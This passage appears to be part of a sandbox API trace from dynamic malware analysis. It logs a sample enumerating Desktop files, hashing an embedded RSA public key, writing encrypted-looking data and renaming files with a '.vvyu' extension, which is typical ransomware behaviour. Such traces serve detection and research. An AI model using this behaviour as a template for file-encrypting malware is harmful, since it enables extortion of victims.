dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.204] GetCurrentThreadId () returned 0x66c [0192.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0192.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935b8 [0192.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93510 [0192.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0192.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93528 [0192.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0192.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934f8 [0192.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935d0 [0192.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0192.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93558 [0192.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93540 [0192.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c935e8 [0192.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93540 [0192.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93558 | out: hHeap=0x620000) returned 1 [0192.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0192.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0192.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93510 [0192.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e9a760 [0192.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935b8 | out: hHeap=0x620000) returned 1 [0192.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0192.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935e8 | out: hHeap=0x620000) returned 1 [0192.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e9a970 [0192.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0192.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0192.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93510 | out: hHeap=0x620000) returned 1 [0192.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e9ab88 [0192.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9a970 | out: hHeap=0x620000) returned 1 [0192.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ab88 | out: hHeap=0x620000) returned 1 [0192.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0192.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934f8 | out: hHeap=0x620000) returned 1 [0192.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c934c8 | out: hHeap=0x620000) returned 1 [0192.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94c30 | out: hHeap=0x620000) returned 1 [0192.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9a760 | out: hHeap=0x620000) returned 1 [0192.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.215] WriteFile (in: hFile=0x568, lpBuffer=0x2e96a68*, nNumberOfBytesToWrite=0x3cee, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e96a68*, lpNumberOfBytesWritten=0x312fb14*=0x3cee, lpOverlapped=0x0) returned 1 [0192.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.216] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x3cf3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.216] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e96a68 [0192.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e96a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e96e98 [0192.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.217] WriteFile (in: hFile=0x568, lpBuffer=0x2e96e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e96e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96e98 | out: hHeap=0x620000) returned 1 [0192.218] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.218] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.218] CloseHandle (hObject=0x568) returned 1 [0192.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2e96a68 [0192.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.220] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\Cc9_9V6aB.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\cc9_9v6ab.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\Cc9_9V6aB.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\cc9_9v6ab.avi.vvyu")) returned 1 [0192.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0192.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.224] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.226] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb99a60c0, ftCreationTime.dwHighDateTime=0x1d89b79, ftLastAccessTime.dwLowDateTime=0xb447f90, ftLastAccessTime.dwHighDateTime=0x1d89c43, ftLastWriteTime.dwLowDateTime=0xb447f90, ftLastWriteTime.dwHighDateTime=0x1d89c43, nFileSizeHigh=0x0, nFileSizeLow=0x153f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cmt4.gif", cAlternateFileName="")) returned 1 [0192.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94c30 [0192.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb4658 [0192.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94c30 | out: hHeap=0x620000) returned 1 [0192.227] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\cmt4.gif") returned=".gif" [0192.227] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cmt4.gif" (normalized: "c:\\users\\keecfmwgj\\desktop\\cmt4.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.227] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=87028) returned 1 [0192.227] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.229] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x153ce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.230] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.231] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.231] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x153f4, lpOverlapped=0x0) returned 1 [0192.232] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.232] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.232] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.232] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.233] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.233] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.233] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.233] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.233] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.233] GetLastError () returned 0x0 [0192.233] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.233] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.234] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.234] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.234] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x153f0) returned 0x2ea79b0 [0192.235] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.235] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94c30 [0192.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934c8 [0192.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94be8 [0192.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c934f8 [0192.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93528 [0192.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935d0 [0192.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93540 [0192.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x655b18 [0192.237] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x655b18, Size=0x218) returned 0x2e96a68 [0192.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e96c88 [0192.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0192.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.237] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96c88 | out: hHeap=0x620000) returned 1 [0192.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c935d0 [0192.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0192.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93540 [0192.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93528 [0192.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0192.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0192.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0192.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0192.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93540 | out: hHeap=0x620000) returned 1 [0192.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93528 | out: hHeap=0x620000) returned 1 [0192.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c935d0 | out: hHeap=0x620000) returned 1 [0192.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | 